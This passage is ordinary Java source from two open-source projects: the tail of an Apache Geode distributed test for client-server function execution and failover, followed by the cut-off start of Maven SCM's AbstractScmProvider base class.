FunctionService.onServers(pool); try { ResultCollector rs = member.setArguments(Boolean.TRUE).execute(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Success"); } else if (context.getArguments() instanceof Boolean) { 
resultSender.lastResult(Boolean.TRUE); } } @Override public String getId() { return "Function"; } @Override public boolean hasResult() { return true; } }); List resultList = (List) rs.getResult(); assertEquals(3, resultList.size()); assertEquals(Boolean.TRUE, resultList.get(0)); assertEquals(Boolean.TRUE, resultList.get(1)); assertEquals(Boolean.TRUE, resultList.get(2)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation."); } } /* * Execution of the function on server using the name of the function */ @Test public void testServerExecution_SocketTimeOut() { createScenario(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_SOCKET_TIMEOUT); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.TRUE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecution(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.allServerExecution(isByName, function, toRegister)); } @Test public void testServerExecution_SocketTimeOut_WithoutRegister() { createScenario(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_SOCKET_TIMEOUT); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.FALSE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecution(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.allServerExecution(isByName, function, toRegister)); } /* * Ensure that the while executing the function if the servers is down then the execution is * failover to other available server */ @SuppressWarnings("rawtypes") @Test public void testOnServerFailoverWithOneServerDownHA() { // The test code appears to 
trigger this because the first // call to the function disconnects from the DS but does not call // last result; IgnoredException.addIgnoredException("did not send last result"); createScenario(); server1.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server2.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server3.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); client.invoke(ClientServerFunctionExecutionDUnitTest::createProxyRegion); function = new TestFunction(true, TestFunction.TEST_FUNCTION_HA_SERVER); registerFunctionAtServer(function); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverExecutionHAOneServerDown(Boolean.FALSE, function, Boolean.FALSE)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.verifyMetaData(1, 1)); } @SuppressWarnings("rawtypes") @Test public void testOnServerFailoverWithTwoServerDownHA() { // The test code appears to trigger this because the first // call to the function disconnects from the DS but does not call // last result; IgnoredException.addIgnoredException("Socket Closed"); IgnoredException.addIgnoredException("did not send last result"); createScenario(); server1.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server2.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server3.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); client.invoke(ClientServerFunctionExecutionDUnitTest::createProxyRegion); function = new TestFunction(true, TestFunction.TEST_FUNCTION_HA_SERVER); registerFunctionAtServer(function); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverExecutionHATwoServerDown(Boolean.FALSE, function, Boolean.FALSE)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.verifyMetaData(2, 0)); } /* * Ensure that the while executing the function if the servers are down then the execution * shouldn't failover to other available server */ @Test 
public void testOnServerFailoverNonHA() { // The test code appears to trigger this because the first // call to the function disconnects from the DS but does not call // last result; IgnoredException.addIgnoredException("did not send last result"); createScenario(); server1.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server2.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server3.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); client.invoke(ClientServerFunctionExecutionDUnitTest::createProxyRegion); function = new TestFunction(true, TestFunction.TEST_FUNCTION_NONHA_SERVER); registerFunctionAtServer(function); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecutionNonHA(Boolean.FALSE, function, Boolean.FALSE)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.verifyMetaData(1, 0)); } /* * Execution of the function on a server.Function throws the FunctionInvocationTargetException. As * this is the case of HA then system should retry the function execution. After 5th attempt * function will send Boolean as last result. 
*/ @Test public void testOnServerExecution_FunctionInvocationTargetException() { createScenario(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_ONSERVER_REEXECUTE_EXCEPTION); registerFunctionAtServer(function); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverFunctionExecution_FunctionInvocationTargetException(Boolean.FALSE, function, Boolean.FALSE)); } @Test public void onRegionShouldThrowExceptionWhenThePoolAssociatedWithTheRegionCanNotBeFound() { function = new TestFunction(true, TEST_FUNCTION1); createScenario(); registerFunctionAtServer(function); server1.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server2.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server3.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); client.invoke(() -> { ClientServerFunctionExecutionDUnitTest.createProxyRegion(); assertThatThrownBy(() -> HijackedFunctionService.onRegion(metaDataRegion).execute(function)) .isInstanceOf(IllegalStateException.class) .hasMessageMatching("Could not find a pool named (.*)"); }); } private static class HijackedFunctionService extends FunctionService { public HijackedFunctionService(FunctionExecutionService functionExecutionService) { super(functionExecutionService); } public static Execution onRegion(Region region) { return new HijackedInternalFunctionServiceImpl().onRegion(region); } } private static class HijackedInternalFunctionServiceImpl extends InternalFunctionExecutionServiceImpl { @Override protected Pool findPool(String poolName) { return null; } } private void createScenario() { logger .info("ClientServerFFunctionExecutionDUnitTest#createScenario : creating scenario"); createClientServerScenarionWithoutRegion(); } private static void serverExecution(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = 
FunctionService.onServer(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); assertEquals(Boolean.TRUE, ((List) rs.getResult()).get(0)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } try { final HashSet<String> testKeysSet = new HashSet<>(); for (int i = 0; i < 20; i++) { testKeysSet.add("execKey-" + i); } ResultCollector rs = execute(member, testKeysSet, function, isByName); List resultList = (List) rs.getResult(); for (int i = 0; i < 20; i++) { assertTrue(((List) (resultList.get(0))).contains("execKey-" + i)); } } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operations"); } } private static void executeRegisteredFunction() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServer(pool); // remove any existing attributes ((AbstractExecution) member).removeFunctionAttributes(TestFunction.TEST_FUNCTION1); ResultCollector rs = member.setArguments(Boolean.TRUE).execute(TestFunction.TEST_FUNCTION1); assertEquals(Boolean.TRUE, ((List) rs.getResult()).get(0)); byte[] functionAttributes = ((AbstractExecution) member).getFunctionAttributes(TestFunction.TEST_FUNCTION1); assertNotNull(functionAttributes); } private static void serverExecution_SendException(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); assertTrue(((List) rs.getResult()).get(0) instanceof MyFunctionExecutionException); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } try { final HashSet<String> testKeysSet = new HashSet<>(); for (int i = 0; i < 20; i++) { 
testKeysSet.add("execKey-" + i); } ResultCollector rs = execute(member, testKeysSet, function, isByName); List resultList = (List) rs.getResult(); assertEquals((testKeysSet.size() + 1), resultList.size()); Iterator resultIterator = resultList.iterator(); int exceptionCount = 0; while (resultIterator.hasNext()) { Object o = resultIterator.next(); if (o instanceof MyFunctionExecutionException) { exceptionCount++; } } assertEquals(1, exceptionCount); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operations"); } } private static void createReplicatedRegion() { metaDataRegion = cache.createRegionFactory(RegionShortcut.REPLICATE).create(retryRegionName); } public static void createProxyRegion() { CacheServerTestUtil.disableShufflingOfEndpoints(); AttributesFactory factory = new AttributesFactory(); factory.setScope(Scope.LOCAL); factory.setDataPolicy(DataPolicy.EMPTY); factory.setPoolName(pool.getName()); RegionAttributes attrs = factory.create(); metaDataRegion = cache.createRegion(retryRegionName, attrs); assertNotNull(metaDataRegion); } private static void verifyMetaData(Integer arg1, Integer arg2) { try { if (arg1 == 0) { assertNull(metaDataRegion.get("stopped")); } else { assertEquals(metaDataRegion.get("stopped"), arg1); } if (arg2 == 0) { assertNull(metaDataRegion.get("sentresult")); } else { assertEquals(metaDataRegion.get("sentresult"), arg2); } } catch (Exception e) { e.printStackTrace(); fail("The metadata doesn't match with the expected value."); } } public static void verifyDeadAndLiveServers(final Integer expectedLiveServers) { WaitCriterion wc = new WaitCriterion() { String excuse; @Override public boolean done() { int sz = pool.getConnectedServerCount(); logger.info("Checking for the Live Servers : Expected : " + expectedLiveServers + " Available :" + sz); if (sz == expectedLiveServers) { return true; } excuse = "Expected " + expectedLiveServers + " but found " + sz; return false; } 
@Override public String description() { return excuse; } }; GeodeAwaitility.await().untilAsserted(wc); } private static Object serverExecutionHAOneServerDown(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); ResultCollector rs = null; try { ArrayList<String> args = new ArrayList<>(); args.add(retryRegionName); args.add("serverExecutionHAOneServerDown"); rs = execute(member, args, function, isByName); assertEquals(retryRegionName, ((List) rs.getResult()).get(0)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } return rs.getResult(); } private static void serverExecutionHATwoServerDown(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ArrayList<String> args = new ArrayList<>(); args.add(retryRegionName); args.add("serverExecutionHATwoServerDown"); execute(member, args, function, isByName); fail("Expected ServerConnectivityException not thrown!"); } catch (Exception ex) { if (!(ex instanceof ServerConnectivityException)) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } } } private static Object serverExecutionNonHA(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ArrayList<String> args = new ArrayList<>(); args.add(retryRegionName); args.add("serverExecutionNonHA"); execute(member, args, function, isByName); fail("Expected ServerConnectivityException not thrown!"); } catch (Exception ex) { if (!(ex 
instanceof ServerConnectivityException)) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } } return null; } @SuppressWarnings("rawtypes") private static void serverFunctionExecution_FunctionInvocationTargetException(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); ArrayList list = (ArrayList) rs.getResult(); assertEquals("Value of send result of the executed function : " + list.get(0) + "does not match the expected value : " + 1, 1, (int) ((Integer) list.get(0))); assertTrue("Value of last result of the executed function : " + list.get(0) + "is not equal or more than expected value : " + 5, ((Integer) list.get(1)) >= 5); } catch (Exception ex) { ex.printStackTrace(); Assert.fail("This is not expected Exception", ex); } } private static void serverExecution_NoLastResult(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); assertEquals(Boolean.TRUE, ((List) rs.getResult()).get(0)); fail("Expected FunctionException : Function did not send last result"); } catch (Exception ex) { assertTrue(ex.getMessage().contains("did not send last result")); } } private static void serverExecution_Inline() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServer(pool); try { ResultCollector rs = member.setArguments(Boolean.TRUE).execute(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = 
context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Success"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.TRUE); } } @Override public String getId() { return getClass().getName(); } @Override public boolean hasResult() { return true; } }); assertEquals(Boolean.TRUE, ((List) rs.getResult()).get(0)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation nn TRUE"); } } private static void serverExecution_Inline_InvalidAttributes() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServer(pool); try { member.setArguments(Boolean.TRUE).execute(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Success"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.TRUE); } } @Override public String getId() { return getClass().getName(); } @Override public boolean hasResult() { return false; } @Override public boolean isHA() { return true; } }); fail("Should have failed with Invalid attributes."); } catch (Exception ex) { logger.info("Exception : ", ex); assertTrue( ex.getMessage().contains("For Functions with isHA true, hasResult must also be true.")); } } private static void allServerExecution(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } else { FunctionService.unregisterFunction(function.getId()); assertNull(FunctionService.getFunction(function.getId())); } Execution member = FunctionService.onServers(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); List resultList = (List) 
rs.getResult(); assertEquals(Boolean.TRUE, resultList.get(0)); assertEquals(Boolean.TRUE, resultList.get(1)); assertEquals(Boolean.TRUE, resultList.get(2)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } try { final HashSet<String> testKeysSet = new HashSet<>(); for (int i = 0; i < 20; i++) { testKeysSet.add("execKey-" + i); } ResultCollector rs = execute(member, testKeysSet, function, isByName); List resultList = (List) rs.getResult(); assertEquals(3, resultList.size()); for (int j = 0; j < 3; j++) { for (int k = 0; k < 20; k++) { assertTrue((((List) (resultList).get(j)).contains("execKey-" + k))); } } } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } } private static void allServerExecution_SendException(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } else { FunctionService.unregisterFunction(function.getId()); assertNull(FunctionService.getFunction(function.getId())); } Execution member = FunctionService.onServers(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); List resultList = (List) rs.getResult(); assertTrue(resultList.get(0) instanceof MyFunctionExecutionException); assertTrue(resultList.get(1) instanceof MyFunctionExecutionException); assertTrue(resultList.get(2) instanceof MyFunctionExecutionException); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } try { final HashSet<String> testKeysSet = new HashSet<>(); for (int i = 0; i < 20; i++) { testKeysSet.add("execKey-" + i); } ResultCollector rs = execute(member, testKeysSet, function, isByName); List resultList = (List) rs.getResult(); assertEquals(((testKeysSet.size() * 3) + 3), resultList.size()); 
Iterator resultIterator = resultList.iterator(); int exceptionCount = 0; while (resultIterator.hasNext()) { Object o = resultIterator.next(); if (o instanceof MyFunctionExecutionException) { exceptionCount++; } } assertEquals(3, exceptionCount); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } } private static void allServerExecution_NoLastResult(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } else { FunctionService.unregisterFunction(function.getId()); assertNull(FunctionService.getFunction(function.getId())); } Execution member = FunctionService.onServers(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); rs.getResult(); fail("Expected FunctionException : Function did not send last result"); } catch (Exception ex) { assertTrue(ex.getMessage().contains("did not send last result")); } } private static void allServerExecution_Inline() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServers(pool); try { ResultCollector rs = member.setArguments(Boolean.TRUE).execute(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Success"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.TRUE); } } @Override public String getId() { return getClass().getName(); } @Override public boolean hasResult() { return true; } }); List resultList = (List) rs.getResult(); assertEquals(Boolean.TRUE, resultList.get(0)); assertEquals(Boolean.TRUE, resultList.get(1)); assertEquals(Boolean.TRUE, resultList.get(2)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : 
", ex); fail("Test failed after the execute operation asdfasdfa "); } } private static ResultCollector execute(Execution member, Serializable args, Function function, Boolean isByName) { if (isByName) {// by name logger.info("The function name to execute : " + function.getId()); Execution me = member.setArguments(args); logger.info("The args passed : " + args); return me.execute(function.getId()); } else { // By Instance return member.setArguments(args).execute(function); } } }
apache/maven-scm
35,806
maven-scm-api/src/main/java/org/apache/maven/scm/provider/AbstractScmProvider.java
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.apache.maven.scm.provider;

import java.io.File;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;

import org.apache.maven.scm.CommandParameter;
import org.apache.maven.scm.CommandParameters;
import org.apache.maven.scm.NoSuchCommandScmException;
import org.apache.maven.scm.ScmBranch;
import org.apache.maven.scm.ScmBranchParameters;
import org.apache.maven.scm.ScmException;
import org.apache.maven.scm.ScmFileSet;
import org.apache.maven.scm.ScmRevision;
import org.apache.maven.scm.ScmTagParameters;
import org.apache.maven.scm.ScmVersion;
import org.apache.maven.scm.command.add.AddScmResult;
import org.apache.maven.scm.command.blame.BlameScmRequest;
import org.apache.maven.scm.command.blame.BlameScmResult;
import org.apache.maven.scm.command.branch.BranchScmResult;
import org.apache.maven.scm.command.changelog.ChangeLogScmRequest;
import org.apache.maven.scm.command.changelog.ChangeLogScmResult;
import org.apache.maven.scm.command.checkin.CheckInScmResult;
import org.apache.maven.scm.command.checkout.CheckOutScmResult;
import org.apache.maven.scm.command.diff.DiffScmResult;
import org.apache.maven.scm.command.edit.EditScmResult;
import org.apache.maven.scm.command.export.ExportScmResult;
import org.apache.maven.scm.command.info.InfoScmResult;
import org.apache.maven.scm.command.list.ListScmResult;
import org.apache.maven.scm.command.login.LoginScmResult;
import org.apache.maven.scm.command.mkdir.MkdirScmResult;
import org.apache.maven.scm.command.remoteinfo.RemoteInfoScmResult;
import org.apache.maven.scm.command.remove.RemoveScmResult;
import org.apache.maven.scm.command.status.StatusScmResult;
import org.apache.maven.scm.command.tag.TagScmResult;
import org.apache.maven.scm.command.unedit.UnEditScmResult;
import org.apache.maven.scm.command.untag.UntagScmResult;
import org.apache.maven.scm.command.update.UpdateScmResult;
import org.apache.maven.scm.repository.ScmRepository;
import org.apache.maven.scm.repository.ScmRepositoryException;
import org.apache.maven.scm.repository.UnknownRepositoryStructure;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/**
 * Convenience base class for {@link ScmProvider} implementations.
 * <p>
 * Every public command method performs a {@code login} against the repository, packs its
 * arguments into a {@link CommandParameters} bag, and delegates to a protected hook method
 * (e.g. {@link #checkin(ScmProviderRepository, ScmFileSet, CommandParameters)}). Concrete
 * providers override only the hooks for the commands they support; unsupported hooks throw
 * {@link NoSuchCommandScmException} by default.
 *
 * @author <a href="mailto:trygvis@inamo.no">Trygve Laugst&oslash;l</a>
 * @author <a href="mailto:evenisse@apache.org">Emmanuel Venisse</a>
 * @author Olivier Lamy
 */
public abstract class AbstractScmProvider implements ScmProvider {
    protected final Logger logger = LoggerFactory.getLogger(getClass());

    // ----------------------------------------------------------------------
    //
    // ----------------------------------------------------------------------

    /**
     * {@inheritDoc}
     */
    @Override
    public String getScmSpecificFilename() {
        // By default providers have no provider-specific metadata file (e.g. ".svn").
        return null;
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public String sanitizeTagName(String tag) {
        /* by default, we assume all tags are valid. */
        return tag;
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public boolean validateTagName(String tag) {
        /* by default, we assume all tags are valid. */
        return true;
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public List<String> validateScmUrl(String scmSpecificUrl, char delimiter) {
        List<String> messages = new ArrayList<>();

        try {
            // Validation is delegated to repository construction; a parse failure
            // is reported as a message rather than propagated.
            makeProviderScmRepository(scmSpecificUrl, delimiter);
        } catch (ScmRepositoryException e) {
            messages.add(e.getMessage());
        }

        return messages;
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public boolean requiresEditMode() {
        return false;
    }

    // ----------------------------------------------------------------------
    // Scm Implementation
    // ----------------------------------------------------------------------

    /**
     * {@inheritDoc}
     */
    @Override
    public AddScmResult add(ScmRepository repository, ScmFileSet fileSet) throws ScmException {
        return add(repository, fileSet, (String) null);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public AddScmResult add(ScmRepository repository, ScmFileSet fileSet, String message) throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setString(CommandParameter.MESSAGE, message == null ? "" : message);

        // TODO: binary may be dependant on particular files though
        // TODO: set boolean?
        parameters.setString(CommandParameter.BINARY, "false");

        return add(repository.getProviderRepository(), fileSet, parameters);
    }

    @Override
    public AddScmResult add(ScmRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        login(repository, fileSet);

        if (parameters.getString(CommandParameter.BINARY, null) == null) {
            // TODO: binary may be dependant on particular files though
            // TODO: set boolean?
            parameters.setString(CommandParameter.BINARY, "false");
        }

        return add(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code add} command; throws {@link NoSuchCommandScmException} unless overridden.
     *
     * TODO: why public? This should be protected, no?
     */
    public AddScmResult add(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("add");
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public BranchScmResult branch(ScmRepository repository, ScmFileSet fileSet, String branchName)
            throws ScmException {
        return branch(repository, fileSet, branchName, new ScmBranchParameters());
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public BranchScmResult branch(ScmRepository repository, ScmFileSet fileSet, String branchName, String message)
            throws ScmException {
        ScmBranchParameters scmBranchParameters = new ScmBranchParameters();

        if (message != null && !message.isEmpty()) {
            scmBranchParameters.setMessage(message);
        }

        return branch(repository, fileSet, branchName, scmBranchParameters);
    }

    @Override
    public BranchScmResult branch(
            ScmRepository repository, ScmFileSet fileSet, String branchName, ScmBranchParameters scmBranchParameters)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setString(CommandParameter.BRANCH_NAME, branchName);

        parameters.setScmBranchParameters(CommandParameter.SCM_BRANCH_PARAMETERS, scmBranchParameters);

        return branch(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code branch} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected BranchScmResult branch(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("branch");
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public ChangeLogScmResult changeLog(
            ScmRepository repository, ScmFileSet fileSet, Date startDate, Date endDate, int numDays, String branch)
            throws ScmException {
        return changeLog(repository, fileSet, startDate, endDate, numDays, branch, null);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public ChangeLogScmResult changeLog(
            ScmRepository repository,
            ScmFileSet fileSet,
            Date startDate,
            Date endDate,
            int numDays,
            String branch,
            String datePattern)
            throws ScmException {
        ScmBranch scmBranch = null;

        if (branch != null && !branch.isEmpty()) {
            scmBranch = new ScmBranch(branch);
        }

        // FIX: previously passed null here, silently discarding the caller's datePattern.
        return changeLog(repository, fileSet, startDate, endDate, numDays, scmBranch, datePattern);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ChangeLogScmResult changeLog(
            ScmRepository repository, ScmFileSet fileSet, Date startDate, Date endDate, int numDays, ScmBranch branch)
            throws ScmException {
        return changeLog(repository, fileSet, startDate, endDate, numDays, branch, null);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ChangeLogScmResult changeLog(
            ScmRepository repository,
            ScmFileSet fileSet,
            Date startDate,
            Date endDate,
            int numDays,
            ScmBranch branch,
            String datePattern)
            throws ScmException {
        final ChangeLogScmRequest request = new ChangeLogScmRequest(repository, fileSet);
        request.setDateRange(startDate, endDate);
        request.setNumDays(numDays);
        request.setScmBranch(branch);
        request.setDatePattern(datePattern);
        return changeLog(request);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ChangeLogScmResult changeLog(ChangeLogScmRequest request) throws ScmException {
        final ScmRepository scmRepository = request.getScmRepository();
        final ScmFileSet scmFileSet = request.getScmFileSet();
        login(scmRepository, scmFileSet);
        return changelog(scmRepository.getProviderRepository(), scmFileSet, request.getCommandParameters());
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public ChangeLogScmResult changeLog(ScmRepository repository, ScmFileSet fileSet, String startTag, String endTag)
            throws ScmException {
        return changeLog(repository, fileSet, startTag, endTag, null);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public ChangeLogScmResult changeLog(
            ScmRepository repository, ScmFileSet fileSet, String startTag, String endTag, String datePattern)
            throws ScmException {
        ScmVersion startRevision = null;
        ScmVersion endRevision = null;

        if (startTag != null && !startTag.isEmpty()) {
            startRevision = new ScmRevision(startTag);
        }

        if (endTag != null && !endTag.isEmpty()) {
            endRevision = new ScmRevision(endTag);
        }

        // FIX: previously passed null here, silently discarding the caller's datePattern.
        return changeLog(repository, fileSet, startRevision, endRevision, datePattern);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ChangeLogScmResult changeLog(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion startVersion, ScmVersion endVersion)
            throws ScmException {
        return changeLog(repository, fileSet, startVersion, endVersion, null);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ChangeLogScmResult changeLog(
            ScmRepository repository,
            ScmFileSet fileSet,
            ScmVersion startVersion,
            ScmVersion endVersion,
            String datePattern)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setScmVersion(CommandParameter.START_SCM_VERSION, startVersion);

        parameters.setScmVersion(CommandParameter.END_SCM_VERSION, endVersion);

        parameters.setString(CommandParameter.CHANGELOG_DATE_PATTERN, datePattern);

        return changelog(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code changelog} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected ChangeLogScmResult changelog(
            ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException {
        throw new NoSuchCommandScmException("changelog");
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public CheckInScmResult checkIn(ScmRepository repository, ScmFileSet fileSet, String tag, String message)
            throws ScmException {
        ScmVersion scmVersion = null;

        if (tag != null && !tag.isEmpty()) {
            scmVersion = new ScmBranch(tag);
        }

        return checkIn(repository, fileSet, scmVersion, message);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public CheckInScmResult checkIn(ScmRepository repository, ScmFileSet fileSet, String message) throws ScmException {
        return checkIn(repository, fileSet, (ScmVersion) null, message);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public CheckInScmResult checkIn(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, String message)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion);

        parameters.setString(CommandParameter.MESSAGE, message);

        return checkin(repository.getProviderRepository(), fileSet, parameters);
    }

    @Override
    public CheckInScmResult checkIn(ScmRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        return checkIn(
                repository,
                fileSet,
                parameters.getScmVersion(CommandParameter.SCM_VERSION, null),
                parameters.getString(CommandParameter.MESSAGE));
    }

    /**
     * Hook for the {@code checkin} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected CheckInScmResult checkin(
